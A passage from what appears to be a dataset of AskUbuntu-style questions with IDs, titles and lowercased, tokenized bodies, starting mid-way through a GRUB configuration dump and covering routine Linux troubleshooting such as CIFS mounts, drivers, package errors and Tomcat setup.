58a6ca20-220b-40c3-9ae0-cfff9cf0aebe else search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe fi echo 'loading linux 3.11.0-12-generic ... ' linux /boot/vmlinuz-3.11.0-12-generic root=uuid=58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-12-generic } menuentry 'ubuntu , with linux 3.11.0-12-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-12-generic-recovery-58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe else search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe fi echo 'loading linux 3.11.0-12-generic ... ' linux /boot/vmlinuz-3.11.0-12-generic root=uuid=58a6ca20-220b-40c3-9ae0-cfff9cf0aebe ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-12-generic } } end /etc/grub.d/10_linux begin /etc/grub.d/20_linux_xen end /etc/grub.d/20_linux_xen begin /etc/grub.d/20_memtest86+ end /etc/grub.d/20_memtest86+ begin /etc/grub.d/30_os-prober end /etc/grub.d/30_os-prober begin /etc/grub.d/30_uefi-firmware menuentry 'system setup ' $ menuentry_id_option 'uefi-firmware ' { fwsetup } end /etc/grub.d/30_uefi-firmware begin /etc/grub.d/40_custom this file provides an easy way to add custom menu entries . simply type the menu entries you want to add after this comment . be careful not to change the 'exec tail ' line above . menuentry 'plop bootmanager ' { insmod ext2 set root='hd0 , gpt2' search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe linux /boot/plpbt.bin } menuentry 'windows 7 ' { insmod ext2 set root='hd0 , gpt2' search -- no-floppy -- fs-uuid -- set=root 58a6ca20-220b-40c3-9ae0-cfff9cf0aebe linux /home/eddy/vmware/windows_7/windows_7.vmdk } end /etc/grub.d/40_custom begin /etc/grub.d/41_custom if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi end /etc/grub.d/41_custom
487328	how to properly set up a 'network drive ' in ubuntu 14.04	i 've got a nas in my home network , which can serve files both via cifs or nfs . some of the shares require a username and password and i want all machines to automatically mount the shares on boot . with my windows machine , i simply connect a network drive , give it a drive letter and put in the username and password . with ubuntu 14.04 , i 'm not sure what 's the right way to do it . first , should i use cifs or nfs ? second , how to set it up ? i found way too many `` how to 's '' and they are all different somehow , so i 'm really confused now . is n't there the way to do it ? : ) edit : i decided for cifs ( thanks to the comments ) , then followed these instructions as suggested . after creating the .smbcredentials file , as well as some folders within the /mnt/ directory , plus adding a line to my /etc/fstab file , i thought i was done . however , there is a problem left . when running mount -a : mount error : could not resolve address for readynas : unknown error the line in fstab looks like this : //readynas/public /mnt/readynas/public cifs iocharset=utf8 , credentials=/home/domdom/.smbcredentials , uid=1000 0 0 apart from that , i 've got some questions : where would you usually mount those shares to ? /mnt sounded like a good place to me , but some people suggest /media . why do i have to download and install cifs-utils when ubuntu is able to mount the shares without ? i can do that via the file manager ( browse network , readynas ( cifs ) , ... ) . the instructions say to secure the .smbcredentials file with two commands , then immediately add that they do n't work with recent ubuntu versions anymore . so , i just go without them ? or do i need to do something else ? is this insecure ? in another source , 'sec=ntlm ' is added to explicitly set the security mode ; i wonder if i need that and how i figure out whether or not i do . man , i wish this was more straightforward . edit 2 i replaced 'readynas ' with the actual ip address and added the 'sec=ntlm ' option . this way , i got it to work , though i still do n't understand the details ( see questions above ) . plus , i feel like using the ip address is more of a workaround , but at least it does work .
487334	need help installing/updating graphics card	i just recently installed ubuntu 14.04 lts on my asus ultrabook s56c . after installing it was running great for a few days and then it started to freeze on me . i 'm not sure on how to install and update my graphics card because i believe that 's what the problem is . i would watch youtube videos and it would get really pixilated and slow . even when i would try and minimize firefox and terminal it would freeze . can someone give me suggestions on what to do ?
487335	java jmx connection on ubuntu server	how do you get a jmx connection started . i started searching and nothing seemed to want to work with jvisualvm that the oracle jdk 7 gives . i used jstatd and got that working but the jmx connection doesnt work software : ubuntu server 12.04 oracle java 7 with jdk thats about everything and thanks for reading .
487338	startxfce4 wont start like it used to	on a chromebook , when i type in `` shell '' , then `` sudo startxfce4 '' , the screen turns black for a second but then it goes back to my chromebook os . i do ctrl+alt+shift+right arrow , nothing happens . can someone help me ? edit : here is more information about my problem when i do `` sudo startxfce4 '' . crouton/ubuntu wo n't start . http : //i.stack.imgur.com/ffsy0.png
487340	huawei e353 s-6 ( bsnl 3g 14.4mbps ) works in ubuntu 13.04 but not in ubuntu 14.04	in ubuntu 13.04 , huawei e353 gets detected using lsusb # lsusb | grep huawei id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard , the output of usb_modeswitch is # sudo usb_modeswitch -v 0x12d1 -p0x1506 looking for default devices ... found matching product id adding device found device in default mode , class or configuration ( 1 ) accessing device 004 on bus 001 ... getting the current device configuration ... ok , got current device configuration ( 1 ) using first interface : 0x00 using endpoints 0x0f ( out ) and 0x8e ( in ) not a storage device , skipping scsi inquiry usb description data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - manufacturer : huawei product : huawei mobile serial no . : not provided -- -- -- -- -- -- -- -- -- -- -- -- - warning : no switching method given . - > run lsusb to note any changes . bye . and the mobilepartner is showing network signal and connecting to internet but in ubuntu 14.04 ( with linux-headers-3.13.0-24-generic , usb-modeswitch_2.2.0+repack0-1_i386 and usb-modeswitch-data_20140529-1_all ) , huawei e353 gets detected using lsusb # lsusb | grep huawei bus 001 device 007 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard and the output of usb_modeswitch is # sudo usb_modeswitch -v 0x12d1 -p0x1506 look for default devices ... product id matched found devices in default mode ( 1 ) access device 009 on bus 001 current configuration number is 1 use interface number 0 usb description data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - manufacturer : huawei product : huawei mobile serial no . : not provided -- -- -- -- -- -- -- -- -- -- -- -- - warning : no switching method given . see documentation - > run lsusb to note any changes . bye ! but the mobilepartner is not showing network signal and not connecting to internet
487341	unable to make two ubuntu machines interact after connecting with synergy ?	i have ubuntu 14.04 , and synergy 1.4.12 on both machines . i was able to make them connect ( was not straight forward tho ) . i created the same hotkey to switch to `` left '' machine , on both server and client just to make it sure . no matter what i try on client ( neither on server just out of hope already ) , nothing never happens ... all info everywhere seems outdated , is this application broken ? also a good alternative could be the answer , despite it have some interesting encrypted connection rules ; also i just tried x11vncserver and it looked even more hard to make work ...
487343	how to completly remove php libraries ?	i use zsh . when i try to upgrade the system , some packages related to php pop up , i want to remove them sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages will be upgraded : fonts-opensymbol kdelibs-bin kdelibs5-data kdelibs5-plugins kdoctools libkcmutils4 libkde3support4 libkdeclarative5 libkdecore5 libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkemoticons4 libkfile4 libkhtml5 libkidletime4 libkio5 libkjsapi4 libkjsembed4 libkmediaplayer4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkparts4 libkprintutils4 libkpty4 libkrosscore4 libktexteditor4 libnepomuk4 libnepomukquery4a libnepomukutils4 libplasma3 libsolid4 libssl1.0.0 libssl1.0.0 : i386 libthreadweaver4 openssl php-pear php5-cli php5-common php5-curl php5-fpm php5-gd php5-intl php5-mysql php5-pspell php5-readline php5-recode php5-snmp php5-sqlite php5-tidy php5-xmlrpc php5-xsl 54 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 18.4 mb/20.0 mb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] what i tried : sudo apt-get remove php reading package lists ... done building dependency tree reading state information ... done e : unable to locate package php âś sudo apt-get remove php* zsh : no matches found : php* sudo apt-get remove php * reading package lists ... done building dependency tree reading state information ... done package 'dropbox ' is not installed , so not removed e : unable to locate package php e : unable to locate package avlfolder e : unable to locate package boot-scripts e : unable to locate package calibre library e : unable to locate package desktop e : unable to locate package documents e : unable to locate package downloads e : unable to locate package dungeons and dragons online e : unable to locate package games e : unable to locate package java ide e : unable to locate package jdownloader e : unable to locate package lello e : unable to locate package liberam e : unable to locate package music e : unable to locate package netbeans-8.0 e : could n't find any package by regex 'netbeans-8.0' e : unable to locate package netbeans-8.0.desktop e : could n't find any package by regex 'netbeans-8.0.desktop' e : unable to locate package pictures e : unable to locate package playonlinux 's virtual drives e : unable to locate package projects e : unable to locate package public e : unable to locate package qtprojects e : unable to locate package savage2 e : unable to locate package sketchbook e : unable to locate package templates e : unable to locate package text.txt e : could n't find any package by regex 'text.txt' e : unable to locate package themes e : unable to locate package tor-browser-linux64-3.6.1_en-us.tar.xz e : could n't find any package by regex 'tor-browser-linux64-3.6.1_en-us.tar.xz' e : unable to locate package videos e : unable to locate package virtualbox vms e : unable to locate package workspace e : unable to locate package xal and i tried the same with php5 and with purge , nothing has changed . autoremove did n't work either update since i had no answer so far , i ran sudo apt-get remove -- purge php-pear php5-cli php5-common php5-curl php5-fpmphp5-gd php5-intl php5-mysql php5-pspell php5-readline php5-recode php5-snmpphp5-sqlite php5-tidy php5-xmlrpc php5-xsl [ sudo ] password for elie : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package php5-fpmphp5-gd e : unable to locate package php5-snmpphp5-sqlite i was looking for a better solution , anyway i do n't understand how php5-fpmphp5-gd and php5-snmpphp5-sqlite need to be upgraded if they are n't installed . how could the system detect that they need to be upgraded , but did n't detect them when i tried to remove them ?
487344	what is a good point-and-click way to draw simple dot and line 3d graphs ?	i 'd like to draw simple , 3d dot and line graphs like the following : i would prefer the resulting images to be rotatable . i am aware of coded solutions such as tikz , but i want something more fluid and point-and-click so that i can change it very easily and use it to help me think . what is an open-source solution for this ?
487345	need help restoring ubuntu 14.04	it seems to me that everything i 've been trying is just digging me more into a deeper hole . not to sure about whats really wrong with my laptop at the moment . i was wondering if there is a way to factory restore abuntu ? any suggestions ? thanks
487347	how to make ubuntu install avoid bad blocks ?	i know this may be a duplicate , but i think my case is unique enough to warrant another question . i have a 320gb 7200 rpm hdd with the last half of the disk basically perfect , but the first half has ( i think ) some physical surface imperfections from being knocked around in a car while running . i checked the disk after that incident , and it said the disk was failing . i continued after that , and while it still said the disk was failing , it did n't change , nor did i have any problems with anything other than the first half of the disk . i have some screenshots taken a few minutes ago of what the disks application says about the disk from the smart data . i switched the disk from an old 32 bit computer to a 64 bit one , and want to install 64 bit ubuntu without wiping out the 32 bit zorin os on the second to last partition . the ubuntu installer fails when i try to install on the first half of the disk , where part way through installation it says i/o error , and the installer crashes . i want to know how i can make the installer avoid the bad spots and install regardless . here is a bit of what the smart data says : reallocated sector count : 0 sectors , threshold 5 , worst 1 , normalized 1 , reallocation count : 4459 , normalized 9 , worst 9 , threshold 0 , uncorrectable sectors : 0
487349	latitude e6500 flickering sreen	i just installed ubuntu 14.04 on my dell latitude e6500 ( deleting windows 7 in the process ) and it seems to be running well except every 10 seconds or so the screen becomes very flashy/blurry . this does not seem to effect anything else in any way . my system has an integrated intel速 graphics media accelerator 4500mhd chip . ubuntu seems to recognize it and looking around forums people say driver support is built right into the kernel ( i think my system is fully updated ) . i found an earlier post saying this problem may be fixed by setting the system not to detect randr monitor changes : http : //ubuntuforums.org/showthread.php ? t=2188084 but i do not know how to do this . the menu - > system - > administration - > advanced - > service manager - > uncheck `` detect randr ( monitor ) changes '' path is not available as far as i can tell . does anyone know of an alternative path that does the same thing ?
487350	full switch to systemd from sysv ( apt-get install systemd-sysv not working )	i have systemd installed , but i want to make a full switch . i 've read here that i should just install systemd-sysv , but when i attempt to do that i get this message : root @ arm : /usr/lib/systemd # aptitude install systemd-sysv the following new packages will be installed : systemd-sysv { b } 0 packages upgraded , 1 newly installed , 0 to remove and 24 not upgraded . need to get 15.1 kb of archives . after unpacking 55.3 kb will be used . the following packages have unmet dependencies : systemd-sysv : conflicts : sysvinit but 2.88dsf-41+deb7u1 is installed . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) systemd-sysv [ not installed ] accept this solution ? [ y/n/q/ ? ] n *** no more solutions available *** should i simply uninstall syvinit first ? if so , how can i make sure i do so cleanly ( making sure all dependencies are removed also ) ? is these serror message symptomatic of a larger problem ? thanks .
487351	convert seconds since epoch to a human readable string	command date + % s produces 1403568422 . is there an easy way to convert the 1403568422 to a human readable utc timestamp ? python -c `` import datetime ; print datetime.datetime.utcfromtimestamp ( 1403568422 ) .isoformat ( ) '' kind of works ; i can also write a short c program to do the same thing . is there a better way ? clarification i do not want to make date print the current time in utc . i want date ( or other utility ) to convert a given number of seconds since utc - say 1403568422 - to a human readable format . background : i have these timestamps in a file and i wanted to know when exactly the things happened .
487352	configure privacy settings via the command line	i am trying to compile a script to run upon booting a network attached computer ( which has no hard drive and therefore is a new computer upon every reboot ) to configure all settings . because it will be run during startup . i need to find ways to turn off the `` record activity '' and/or `` send reports '' functions just using the command line ?
487355	can you install ubuntu from a usb on a windows 8.1 computer	i 'm having some problems installing ubuntu on my samsung windows 8.1 computer . when i go into my bios setup menu , it does n't have an option to boot from my usb . i am trying to download everything and install it again . just thought i could get some help here .
487357	reproduction of a conky effect	how to reproduce this beautiful conky effect ? any brilliant idea , please ? thanks a lot !
487359	14.04 - plex does n't recognize tv show files	i 'm using 14.04 and have installed plex . plex recognizes all my movie files , but is only `` seeing '' a few of my tv show files . i have followed the plex file naming convention . i have refreshed and updated . no luck . i had a previous version on a 13.xx ubuntu and everything worked fine . these are the same media files , but plex does n't seem to see them . any suggestions ? ( i 'm relatively green in the ubuntu world . )
487361	recovery partition in windows 8 hogging space	ok , i am trying ubuntu alongside windows 8.1 . i have used ubuntu briefly when i had win7 but that was many many years ago , and went by a lot easier . the issue i 'm having is that windows 8.1 has a recovery partition that is hogging 9gb of my hard drive . this has caused me to not have any space to do almost anything in ubuntu . can i safely remove recovery ? if i do remove it can the space freed be used for ubuntu ? does simply deleting apps and files from windows 8.1 matter for space in ubuntu ? i also want to add that ubuntu is installed and working , however any ubuntu apps wo n't install and ubuntu wo n't update due to lack of memory .
487362	backup problem in ubuntu 14.04	when i 'm backing up my files using the backup application .at the last time it shows a error that could not backup the following files make sure you are able to open them /home/neel/.cache/dconf /home/neel/.dbus
487363	can not download youtube-dl	i was trying to download a video from youtube using youtube-dl , but i got the sig error , so i tried to update youtube-dl to the latest version and it was n't working ( i 'm sorry , i do n't remember what the error was or what it said in the terminal when i tried to update ) . so , i tried uninstalling and then reinstalling youtube-dl . the uninstalling part worked fine , it 's the installing part that i need help with now . i tried typing `` sudo apt-get install youtube-dl '' and i get this : reading package lists ... done building dependency tree reading state information ... done youtube-dl is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . so , i assumed that that meant that i had it installed , but when i tried to use it , nothing happens , or rather i just get this : root @ chaaaaaaarlie3 : ~ # youtube-dl https : //www.youtube.com/watch ? v=eisomx-vmow root @ chaaaaaaarlie3 : ~ # and the video obviously does n't download . i have been trying to fix this problem for awhile now and i have no idea what to do . i also have almost no knowledge of how to use terminals/ubuntu/computers/things of that sort , so if you could be very specific when helping me , i 'd appreciate it . ( okay , i 'm not completely stupid , but i really do n't know much . let 's just say that youtube-dl is the only thing that i use terminals for > . > ) oh , and i 'm not sure if this would be what 's messing up my attempts to use youtube-dl , but i think i uninstalled youtube-dl and it 's dependencies and i may have purged my local/config files for youtube-dl , too . i ca n't really remember all that i did last night when i was trying to fix this ...
487364	ubuntu 14.04 configure help	well it seems that my firefox is only a small problem in a much bigger problem . i have discovered that i have an error of some sort in my configuration . how do i find out what is wrong and how do i fix it ?
487369	ubuntu for laptop with 6 gig ram 32 bit	trying to download ubuntu for first time . on the ubuntu site it does not offer me a version 14.04 with 32 bit and about 2g ram . where do i locate a version suitable for my 32 bit 6g ram laptop ? thanks charles
487371	how do i disable keyboard shortcut for launcher in 14.04	several of the keyboard shortcuts ( ctrl+shift , ctrl+shift+f ) conflict with eclipse shortcuts in 14.04 . how do i disable these keyboard shortcuts ? i do not see any options for these specific shortcuts under keyboard . thanks .
487374	how to install tomcat7 in ubuntu 14.04 lts ?	if i apt-get install tomcat7 it is installing a broken tomcat7 . a simple startup.sh will give me errors , than when fixed says that tomcat has started but nothing shows up in localhost:8080. shutdown.sh will give me errors and even throw java exceptions . this was n't happening in some previous ubuntu release , where it simply worked . so , it is looks like tomcat package it been not maintained lately . i can get it working from eclipse ( which by the way it is not been properly maintain too ) when i am testing my web app . however there are things i need to test in an standalone tomcat installation . so far , google has n't helped . have any of you managed to properly installing tomcat7 in ubuntu 14.4lts ? if so , can you point me to the right direction ? edit : here is some logs . starting tomcat : $ sudo /usr/share/tomcat7/bin/startup.sh using catalina_base : /usr/share/tomcat7 using catalina_home : /usr/share/tomcat7 using catalina_tmpdir : /usr/share/tomcat7/temp using jre_home : /usr using classpath : /usr/share/tomcat7/bin/bootstrap.jar : /usr/share/tomcat7/bin/tomcat-juli.jar tomcat started . browsing to localhost:8080 ( and http : //127.0.0.1:8080 , http : //127.0.0.1 , http : // [ my network ip here ] ) : oops ! google chrome could not connect to localhost:8080 stopping tomcat also fails : $ sudo /usr/share/tomcat7/bin/shutdown.sh using catalina_base : /usr/share/tomcat7 using catalina_home : /usr/share/tomcat7 using catalina_tmpdir : /usr/share/tomcat7/temp using jre_home : /usr using classpath : /usr/share/tomcat7/bin/bootstrap.jar : /usr/share/tomcat7/bin/tomcat-juli.jar jul 03 , 2014 7:15:55 pm org.apache.catalina.startup.classloaderfactory validatefile warning : problem with directory [ /usr/share/tomcat7/common/classes ] , exists : [ false ] , isdirectory : [ false ] , canread : [ false ] jul 03 , 2014 7:15:55 pm org.apache.catalina.startup.classloaderfactory validatefile warning : problem with directory [ /usr/share/tomcat7/common ] , exists : [ false ] , isdirectory : [ false ] , canread : [ false ] jul 03 , 2014 7:15:55 pm org.apache.catalina.startup.classloaderfactory validatefile warning : problem with directory [ /usr/share/tomcat7/server/classes ] , exists : [ false ] , isdirectory : [ false ] , canread : [ false ] jul 03 , 2014 7:15:55 pm org.apache.catalina.startup.classloaderfactory validatefile warning : problem with directory [ /usr/share/tomcat7/server ] , exists : [ false ] , isdirectory : [ false ] , canread : [ false ] jul 03 , 2014 7:15:55 pm org.apache.catalina.startup.classloaderfactory validatefile warning : problem with directory [ /usr/share/tomcat7/shared/classes ] , exists : [ false ] , isdirectory : [ false ] , canread : [ false ] jul 03 , 2014 7:15:55 pm org.apache.catalina.startup.classloaderfactory validatefile warning : problem with directory [ /usr/share/tomcat7/shared ] , exists : [ false ] , isdirectory : [ false ] , canread : [ false ] jul 03 , 2014 7:15:55 pm org.apache.catalina.startup.catalina stopserver severe : catalina.stop : java.io.filenotfoundexception : /usr/share/tomcat7/conf/server.xml ( no such file or directory ) at java.io.fileinputstream.open ( native method ) at java.io.fileinputstream. < init > ( fileinputstream.java:146 ) at org.apache.catalina.startup.catalina.stopserver ( catalina.java:466 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.apache.catalina.startup.bootstrap.stopserver ( bootstrap.java:370 ) at org.apache.catalina.startup.bootstrap.main ( bootstrap.java:457 )
487379	how to install hp laser jet 1020 plus printer ?	i 'm new to ubuntu ( 14.04 ) . i have to print some documents , but i ca n't set up my printer ( hp laser jet 1020 plus ) . please tell me the proper way to set-up and install it .
487381	risks of exposing ipmi and ubuntu 12.04.4	i just received an email from us-cert ( us-cert @ ncas.us-cert.gov ) regarding `` risks of exposing the intelligent platform management interface ( ipmi ) '' . i viewed the synaptic package manager on my machine and found nothing related to ipmi installed . so , do i need to be concerned about this security risk ? here is the link to the us-cert advisory ( risks of exposing the intelligent platform management interface ( ipmi ) )
487384	what is gnome 3 ?	so i am really new to ubuntu and i just installed 14.04 lts on my laptop . i 'm wondering what gnome 3 is ? what does it do and do i need it ? what are your thoughts , let me know . thanks
487386	how can cups dynamically determine the ip address of a network printer ?	i am trying to set up cups to access a network printer . its ip address was assigned via dhcp by the internet router , which is also the dhcp server . i understand that this address may change from time to time . how can i instruct cups to obtain the printer 's ip address ?
487387	ubuntu is misbehaving severely	things i open , close randomly ( while still running in the background as processes ) . apt-get keeps returning directory does not exist and locked directory errors . the os was unable to find the /tmp directory on boot and a system repair had to be done . i 've had ubuntu installed since 14.04 came out . the problems have only started recently . edit : read-only filesystem , no write access . edit : messages does n't exist . kern.log http : //pastebin.com/vbehtajz boot.log http : //pastebin.com/dbd5xbdx
487388	belkin n52te driver install	i tried fallowing this thread how do i configure a belkin n52te gamepad to work ? and http : //ubuntuforums.org/showthread.php ? t=948833 to get my belkin n52te to work . neither of which worked . when i did the ubuntuforums way i got this error `` lookuperror no uinput device-nodes found '' using the other i got no hardware found when running the jnostromo . lsusb gives me 2 different n52te 's bus 002 device 011 : id 050d:0200 belkin components nostromo speedpad n52te gaming keyboard bus 002 device 007 : id 050d:0415 belkin components i tried switching between these two and neither worked either .
487392	play m3u from browser	i want to listen to online radio station from tunein ( this is an example radio station ) . however , the m3u stream does n't play from my browser ( both chrome and firefox ) . the fact is that i do not have any problem when using my windows os . do you know how i can fix that ?
487398	how do i display cpu fanspeed as a graph using conky	i have cpu fanspeed written as $ { hwmon 1 fan 1 } but i want to display the results as a graph . much the same way upspeedgraph and downspeedgraph are used to display up and down speeds . how would i go about writing the code to achieve this type of display ? thank you
487399	install vlc plugin on chrome	i have ubuntu 14.04 64 bit with vlc media player installed and i have also installed mozilla-plugin-vlc . i can see that vlc web plugin is installed at mozilla ( about : addons ) but not at chrome ( chrome : //plugins/ ) . do you know how i can install that ? i could n't find anything helpful in the net .
487405	unable to install most major packages ; unmet dependencies and can not be fixed	i just did a fresh install of ubuntu 14.04 64-bit , and it seems that most major packages i attempt to install ( among them being skype , steam/steam-launcher , wine , etc . ) , give an `` unmet dependencies '' error and refuse to install . i have looked at several other questions of a similar description ( many duplicates ) but none of the solutions worked and i have not yet found someone with this specific issue . installing steam : ben @ ben-thinkpad-u14 : ~ $ sudo apt-get install steam reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : qtdeclarative5-qtfeedback-plugin : depends : libqt5feedback5 but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . ben @ ben-thinkpad-u14 : ~ $ installing wine 1.6 : ben @ ben-thinkpad-u14 : ~ $ sudo apt-get install wine1.6 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.6 : depends : wine1.6-amd64 ( = 1:1.6.2-0ubuntu4 ) but it is not going to be installed depends : wine1.6-i386 ( = 1:1.6.2-0ubuntu4 ) e : unable to correct problems , you have held broken packages . ben @ ben-thinkpad-u14 : ~ $ installing skype : ben @ ben-thinkpad-u14 : ~ $ sudo apt-get install skype reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages . ben @ ben-thinkpad-u14 : ~ $ i get similar errors with some other packages i 've tried as well . any help would be greatly appreciated as this problem is currently crippling this system !
487406	how to list out all the user created daemon processes	is there any command which list out all the daemon processes created by users to perform some tasks . i have created various daemon processes and i want to kill it manually by checking its pid how can i do that .
487409	moving torrents from bittorrent ( windows ) to rtorrent ( ubuntu )	ordinarily torrents would be moved en masse by editing resume.dat , but is it possible to relocate torrents like this from bittorrent to rtorrent ? i have a hard drive with a bunch of seeding torrents that i 'd like to transfer to my ubuntu machine , and i 'd like not to have to add them all to rtorrent manually .
487411	ubunto 14.04 incomplete update	i was updating from 13.10 to 14.04 . halfway through the update , it stopped downloading . after 2 hours , i shut down the computer . now when i start i get a screen indicated : system is running in low graphics mode . if i click ok , i get a dialogue box which i do not know what it is asking for . does anyone have any suggestions ?
487413	how to install django on ubuntu ?	im trying to install django . when i use sudo apt-get install pip , there is an error pip not found . i used sudo easy_install pip , there is an error command easy_install not found . i used sudo apt-get install python-virtualenv , even that is not working .
487415	ubuntu studio 14.04 - vlc audio , video issues	i recently upgraded from ubuntu studio 12.04 to 14.04 ( 32-bit ) . since then , vlc media player has not been working properly when playing live tv from comcast . the tv signal goes from a comcast stb , to hauppauge wintv usb , to dell precision 380 workstation , to vlc media player ver 2.1.4 rincewind . audio goes into my soundcard `` line-in '' via a stereo audio cable . note : vlc works perfectly when when playing video files stored on my pc . vlc audio controls work , audio is in sync , and video is properly centered in vlc media player window . but , when playing `` live tv '' via the connections described above , i have the following problems : vlc audio controls do n't work at all . they do not adjust or affect the incoming audio in any way . i can control the audio volume using alsa , but 4 different control sliders have to be up ( master volume , front , line-in , and analog mix ) . none of these sliders move when i try adjusting the volume on vlc . the audio is also out of sync . the audio plays about 1/2 second before the video . using the vlc audio sync `` hotkeys '' ( j and k ) only make the audio more out of sync . the tv video is not centered horizontally in the vlc window . the right margin of live tv videos are flush against the right side of the player , leaving a black letter-box bar on the left side . i read somewhere that this is an issue with some old ( ? ) hauppauge devices on linux . i do n't know if there is a fix for it . strangely , this video issue does not occur when when watching live tv on vlc in windows xp . edit : the fix for this one turned out to be simple . i went to the vlc media player 's `` extended setting '' > video effects > crop , and changed the left `` 0px '' to `` 14px '' . i 'd appreciate any help to fix these issues . i 've tried various settings , connections , etc . on ubuntu and vlc , but the issues persist . note : in the previous version of vlc , i could set the capture mode option to : `` video4linux2 '' ( might have been abbreviated as `` v4l2 '' ) . but , in the new version of vlc , there is no option for `` video4linux2 '' . the current 4 capture mode options are : video camera , digital tv , analog tv , and desktop . i set the capture mode to `` analog tv '' .
487419	where to write the data during disk encryption ?	when a partition is encrypted , a new block device ( mapping ) will be created inside /dev/mapper . now where the data should be written ? into the newly created partition or the original device ( backed device ) ?
487420	wired connection problemâ 	i have set a static interface eth0 to use a wired connection when i am at home . however i never connected without typing this command : sudo service network-interface restart interface=eth0 , sometimes sudo /etc/init.d/networking restart , but also sudo ifconfig eth0 up ( sometimes ) . why ca n't i connect spontaneously since i edited /etc/network/interfaces before and i set eth0 to a receive a static address ?
487425	mouse stops responding randomly	my pc 's mouse stops responding randomly on ubuntu 14.04 . it starts working when i physically replug it or restart the pc . i formatted and reinstalled ubuntu , but the issue persists . my mouse is not faulty since it works perfectly in windows 8 on the same machine .
487426	installation of micromax 353g modem in ubuntu	i bought a micromax 353g modem , but i use ubuntu 13.04 in my laptop . can you tell me how to install on 13.04 ?
487427	smartcards tools in linux	i use some tools to work with smart-cards/readers in windows . such as below : gpj gpshell opensc-tool gp jcmanager now i want to work with card/readers in linux . would you please suggest me some similar tools for linux ? note : i have an acr38 and an acr122u reader .
487428	permission denied while i was installing ubuntu 14.04 by wubi	i have faced a problem when trying to install ubuntu 14.04 version on my windows 7 os by wubi . it say permission denied and refer to the specific folder on drive c ( i make a directory of wubi and iso file in drive d ) . i failed several times while i was installing it . i try to solve it by disable my adaptor make wubi.exe in the same directory with desktop ubuntu . iso file click run wubi.exe result it say `` ca n't download metafile and therefore iso '' or click wubi.exe to download file again by bit torrent wait for 2 hours at the last minute , it say `` permission denied.. bar bar and show me the path '' how could i do or solve it , please help me ... .
487430	ca n't lock spotify to launcher	after upgrading to ubuntu 14.04 and to spotify 0.9.10 , i can no longer lock the spotify icon to the launcher . the option is still there , but clicking `` lock to launcher '' does nothing , and subsequent right clicks show that the option is still `` lock to launcher '' instead of `` unlock from launcher '' . any ideas ?
487435	what do all these updates do ?	i am new to ubuntu and anything linux based . i 'm getting pop ups almost every day telling me of important updates i have to/can install , and am wondering what these updates that come out so regularly actually do ? is their purpose to improve the user experience in the sense of adding features ( ie making the os more cluttered ) or actually improving performance ? if they are simply adding features , i would rather turn them off . now i know there are different types of updates , the security updates are self explanatory , i am however talking about the `` recommended updates '' .
487453	which git gui can show list of files inside stash ?	it was very easy in sourcetree but this tool is not available on linux
487455	what games/app are available for linux to improve english vocabulary ?	i primarily use linux ( ubuntu/kubuntu linux distribution ) . i dont use window . i am looking for some good games or application to improve my english vocabulary . i tried to find on google but did not see anything except few flashcard application to improve vocabulary . and i am not looking for flashcard app as i am already using kwordquiz . if anyone know please share names and links
487473	crash software center	an error occurred , please run package manager from right click or apt get to see what wrong the error message was : error : opening the cache ( e : malformed line 57 in sources list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read e : the package list or status file could not be opened
